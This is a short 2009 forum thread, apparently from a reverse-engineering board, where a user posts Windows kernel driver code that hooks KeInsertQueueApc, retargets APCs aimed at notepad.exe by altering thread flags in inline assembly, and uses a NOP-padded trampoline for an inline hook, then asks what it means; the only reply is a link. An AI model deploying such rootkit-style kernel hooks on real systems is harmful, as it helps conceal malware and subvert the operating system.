HelloRootkit Posted March 25, 2009 Posted March 25, 2009 BOOLEAN __stdcallfake_KeInsertQueueApc(IN PKAPC Apc, IN PVOID SystemArgument1, IN PVOID SystemArgument2, IN KPRIORITY PriorityBoost){ PEPROCESS pTargetProcess; PUCHAR pTargetProcessName; ULONG XXThread; //------------------------------------------------------------------------------------------------------- pTargetProcess=IoThreadToProcess( (PETHREAD)Apc->Thread );// pTargetProcessName=(PUCHAR)((ULONG)pTargetProcess+g_ProcessNameOffset); pTargetProcessName=PsGetProcessImageFileName(pTargetProcess); //-------------------------------------------------------------------------------------------------------// if ((strcmp(pTargetProcessName,"notepad.exe"))||PriorityBoost!=2) if ((strcmp(pTargetProcessName,"notepad.exe"))||PriorityBoost!=2||Apc!=SystemArgument1) { goto Call_KeInsertQueueApc; } else { DbgPrint("TargetProcessName is %s\n",pTargetProcessName); XXThread = (ULONG)Apc->Thread + g_ThreadFlagsOffset; __asm { mov eax, XXThread and [eax], 0xfffffffe } Apc->Thread=KeGetCurrentThread(); goto Call_KeInsertQueueApc; }Call_KeInsertQueueApc: return Proxy_KeInsertQueueApc(Apc,SystemArgument1,SystemArgument2,PriorityBoost); }//================================================================================================__declspec (naked) BOOLEANProxy_KeInsertQueueApc(IN PKAPC Apc, IN PVOID SystemArgument1, IN PVOID SystemArgument2, IN KPRIORITY PriorityBoost){ __asm { _emit 0x90 _emit 0x90 _emit 0x90 _emit 0x90 _emit 0x90 _emit 0x90 _emit 0x90 _emit 0x90 _emit 0x90 _emit 0x90 _emit 0x90 _emit 0x90 }}what's mean?
GamingMasteR Posted March 25, 2009 Posted March 25, 2009 http://forum.tuts4you.com/index.php?showtopic=18615
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now